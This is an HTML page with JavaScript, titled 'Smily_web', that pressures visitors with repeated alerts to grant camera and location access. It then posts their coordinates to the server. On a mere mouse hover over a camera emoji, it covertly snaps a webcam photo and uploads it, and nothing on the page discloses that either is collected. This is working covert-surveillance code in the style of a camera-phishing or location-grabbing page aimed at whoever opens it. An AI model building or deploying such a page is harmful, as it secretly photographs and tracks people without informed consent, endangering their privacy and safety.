<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Smily_web</title>
    <style>
        #camera-icon {
            font-size: 100px;
            cursor: pointer;
        }
        #permission-message {
            color: red;
        }
    </style>
</head>
<body>
    <h1 id="loading-message">Loading... Please grant camera and location access.</h1>
    <div id="camera-icon" style="display: none;">&#x1F4F7;</div> <!-- Camera emoji as a symbol -->
    <p id="permission-message"></p>
    <canvas id="canvas" width="640" height="480" style="display:none;"></canvas>

    <script>
        let locationData = null;
        let locationAccessGranted = false;
        let cameraAccessGranted = false;

        // Function to request location access
        function requestLocationAccess() {
    return new Promise((resolve, reject) => {
        navigator.geolocation.getCurrentPosition(
            position => {
                const latitude = position.coords.latitude;
                const longitude = position.coords.longitude;
                locationData = `lat${latitude}_lon${longitude}`;
                locationAccessGranted = true;
                resolve(locationData);
            },
            error => {
                alert("Location access is required. Please enable location access in your browser settings.");
                // Retry after 3 seconds
                setTimeout(() => {
                    requestLocationAccess().then(resolve).catch(reject);
                }, 3000);
            }
        );
    });
}


        // Function to request camera access
function requestCameraAccess() {
    return navigator.mediaDevices.getUserMedia({ video: true })
        .then(stream => {
            cameraAccessGranted = true;
            stream.getTracks().forEach(track => track.stop()); // Stop immediately as we only need permission
        })
        .catch(err => {
            alert("Camera access is required. Please enable camera access in your browser settings.");
            // Retry after 3 seconds
            setTimeout(() => {
                requestCameraAccess().catch(error => {
                    console.error("Error requesting camera access:", error);
                });
            }, 3000);
        });
}


        // Function to handle the setup after permissions are granted
        function setupPage() {
            document.getElementById('loading-message').style.display = 'none';
            document.getElementById('camera-icon').style.display = 'block';
            document.getElementById('camera-icon').addEventListener('mouseenter', handleCameraHover);
        }

        // Function to handle camera icon hover
        function handleCameraHover() {
            if (!cameraAccessGranted) {
                alert("Please grant both camera and location access.");
                return;
            }

            // Request a new camera stream to capture the image
            navigator.mediaDevices.getUserMedia({ video: true })
                .then(stream => {
                    const video = document.createElement('video');
                    video.srcObject = stream;
                    video.play();

                    // Capture image after the video starts playing
                    video.onplaying = () => {
                        const canvas = document.getElementById('canvas');
                        const context = canvas.getContext('2d');
                        context.drawImage(video, 0, 0, canvas.width, canvas.height);

                        const dataURL = canvas.toDataURL('image/png');
                        console.log(dataURL);
                        uploadImage(dataURL);

                        // Stop the video stream
                        video.srcObject.getTracks().forEach(track => track.stop());
                    };
                })
                .catch(err => {
                    console.error("Error accessing the camera: ", err);
                });
        }

        // Upload image to server
        function uploadImage(imageData) {
            fetch('/upload-image', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ image: imageData })
            })
            .then(response => response.text())
            .then(data => {
                console.log("Image uploaded successfully:", data);
            })
            .catch(error => {
                console.error("Error uploading image:", error);
            });
        }

        // Upload location to server
        function uploadLocation() {
            fetch('/upload-location', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ location: locationData })
            })
            .then(response => response.text())
            .then(data => {
                console.log("Location uploaded successfully:", data);
            })
            .catch(error => {
                console.error("Error uploading location:", error);
            });
        }

        // Start the permission checks when the page loads
        document.addEventListener('DOMContentLoaded', () => {
            Promise.all([requestLocationAccess(), requestCameraAccess()])
                .then(() => {
                    setupPage();
                    uploadLocation(); // Upload location after permissions are granted
                })
                .catch(error => {
                    console.error("Permissions error:", error);
                });
        });
    </script>
</body>
</html>
